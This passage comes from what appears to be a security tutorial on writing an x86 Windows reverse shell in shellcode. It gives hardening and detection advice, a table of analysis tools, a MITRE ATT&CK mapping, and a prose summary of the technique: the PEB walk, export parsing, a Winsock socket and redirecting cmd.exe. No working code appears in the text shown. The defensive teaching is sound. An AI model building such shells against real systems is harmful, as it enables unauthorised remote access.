Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block untrusted processes from removable media), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

Hierarchy diagram mapping each shellcode execution stage to its corresponding detection telemetry source including Windows Event IDs, Sysmon event IDs, ETW providers, ASR rules, and egress firewall controls — Effective defence maps detections to each stage of the kill chain rather than relying on a single indicator — RWX allocation, outbound TCP, and process creation each emit distinct, correlatable telemetry.

12. Tools for Shellcode Analysis

Tool	Description	Link
NASM	Assemble x86 to flat binary	`nasm.us`
WinDbg	Step the PEB walk and export parse live	`microsoft.com`
x64dbg	Dynamic analysis of the loader and payload	`x64dbg.com`
Ghidra	Static disassembly of extracted shellcode	`ghidra-sre.org`
Radare2	Lightweight disassembly and patching	`radare.org`
Sysmon	Generate EID 1/3/8/10 detection telemetry	`microsoft.com`
Volatility	Memory forensics — recover RWX regions and injected code	`volatilityfoundation.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Command and Scripting Interpreter: Windows Command Shell	`T1059.003`	Sysmon EID 1 / 4688 `cmd.exe` spawn chain
Process Injection	`T1055`	Sysmon EID 10 `GrantedAccess` + `CallTrace UNKNOWN`
Process Injection: DLL Injection	`T1055.001`	Sysmon EID 7/8 on reflective-DLL delivery
Obfuscated Files or Information	`T1027`	Null-free/encoded IP/port constants in the blob
Non-Application Layer Protocol	`T1095`	Sysmon EID 3 / 5156 raw TCP from non-browser process
Application Layer Protocol: Web Protocols	`T1071.001`	Proxy/TLS inspection (contrast C2 transport)
System Information Discovery	`T1082`	PEB walk as in-memory module discovery
Native API	`T1106`	Direct `WSASocketA` / `CreateProcessA` calls without framework APIs

Summary

A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
Null-byte and bad-character avoidance is a design constraint, not a post-step — xor for zero, reversed stack strings, runtime-supplied terminators.
Det

Archive

Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

1. What Makes Code Position-Dependent?

2. The Problem with the IAT

3. Windows Memory Layout Primer: TEB, PEB, and the Loader

4. Walking the Module List to Find kernel32.dll

5. Parsing the PE Export Directory

6. Function Name Hashing (ROR-13)

7. RIP-Relative Addressing and the CALL/POP Trick

8. Stack Strings and Null-Byte Elimination

9. x64 ABI Constraints: Shadow Space and Alignment

10. Extraction and Controlled Testing

11. Common Attacker Techniques

12. Defensive Strategies & Detection

13. Tools for PIC Shellcode Analysis

14. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

Writing Your First Shellcode: x86 Reverse Shell from Scratch

1. What Is Shellcode? Constraints and Goals

2. x86 Calling Conventions and Stack Mechanics

3. The PEB Walk: Finding kernel32.dll Without Imports

4. Export Table Parsing: Resolving GetProcAddress

5. Bootstrapping Further API Resolution

6. Winsock Initialisation and Socket Creation

7. Spawning cmd.exe Over the Socket

8. Null-Byte Elimination and Bad-Character Audit

9. Testing and Verification

10. Common Attacker Techniques

11. Defensive Strategies and Detection

12. Tools for Shellcode Analysis

13. MITRE ATT&CK Mapping

Summary

Related Tutorials

References